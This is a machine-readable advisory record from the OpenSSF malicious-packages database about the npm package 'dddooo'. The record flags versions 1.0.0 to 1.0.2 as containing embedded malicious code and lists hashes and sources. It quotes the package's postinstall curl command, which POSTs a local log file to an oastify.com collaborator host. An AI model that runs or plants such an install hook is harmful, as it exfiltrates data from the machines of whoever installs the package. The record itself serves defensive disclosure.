{"id":"MAL-2026-6460","summary":"Malicious code in dddooo (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948)\npackage.json declares a postinstall lifecycle script that runs automatically on `npm install`: `curl -X POST -d \"$(cat /data/logs/monitor-2026-06-16.log)\" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data`. The script reads a file from the installer's filesystem and POSTs its contents over plain HTTP to an attacker-controlled Burp Collaborator (oastify.com) out-of-band interaction subdomain. The package presents itself as a `handy string utility functions` library, but has empty author/homepage/repository fields and includes a malformed `trunls -lae` keyword — the library framing is a cover for the install-time exfiltration. No legitimate string-utility package needs to read system log paths or beacon to oastify.com on install.\n\n## Source: ossf-package-analysis (99d97fdc7c59d1871a9f0771694688026d7ee92d4bc37cdd48a52db1d9055246)\nThe OpenSSF Package Analysis project identified 'dddooo' @ 1.0.2 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package communicates with a domain associated with malicious activity.\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-06-25T16:31:23.421890690Z","published":"2026-06-25T10:05:37Z","database_specific":{"malicious-packages-origins":[{"sha256":"99d97fdc7c59d1871a9f0771694688026d7ee92d4bc37cdd48a52db1d9055246","versions":["1.0.2"],"import_time":"2026-06-25T10:28:39.723204683Z","modified_time":"2026-06-25T10:05:37Z","source":"ossf-package-analysis"},{"id":"IN-MAL-2026-007510","versions":["1.0.2"],"sha256":"554ebc4bc4d5915885da6d519c699c7b6c32cdafddd916bdbf9b0f4be039c706","import_time":"2026-06-25T16:23:39.842588817Z","modified_time":"2026-06-25T16:09:42Z","source":"amazon-inspector"},{"id":"IN-MAL-2026-007512","sha256":"29a1f6b05340c6c5543341f1eb014228ca636936f378ab147b03895c41639d92","versions":["1.0.1"],"import_time":"2026-06-25T16:23:39.973601337Z","modified_time":"2026-06-25T16:09:46Z","source":"amazon-inspector"},{"id":"IN-MAL-2026-007511","sha256":"31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948","versions":["1.0.0"],"import_time":"2026-06-25T16:23:39.91871979Z","modified_time":"2026-06-25T16:09:44Z","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/dddooo/v/1.0.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/dddooo/v/1.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/dddooo/v/1.0.0"}],"affected":[{"package":{"name":"dddooo","ecosystem":"npm","purl":"pkg:npm/dddooo"},"versions":["1.0.2","1.0.1","1.0.0"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha1":"281007f49d847ce0683109ef2cad27e4c5c48296","sha512_sri":"sha512-x7XDaYR5faRQgQu3DSSU+EREGZ56FlZSyz2SZ0x6S08jv36LbDyBhZYu7uhGHD4CpmnEgaNYA3Rz/FHiYSZb7w=="},"filename":"dddooo-1.0.2.tgz"}],"evidence_files":[{"sha256":"47e1d3585afcee791d7f32b2d6c976c2554577cd232b87311834c27db35167d9","tlsh":"da01cb18c6345d3319c82b30bdab0642b112ae5709043c1977c3812c0faf7af50fe22d","path":"package.json"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dddooo/MAL-2026-6460.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}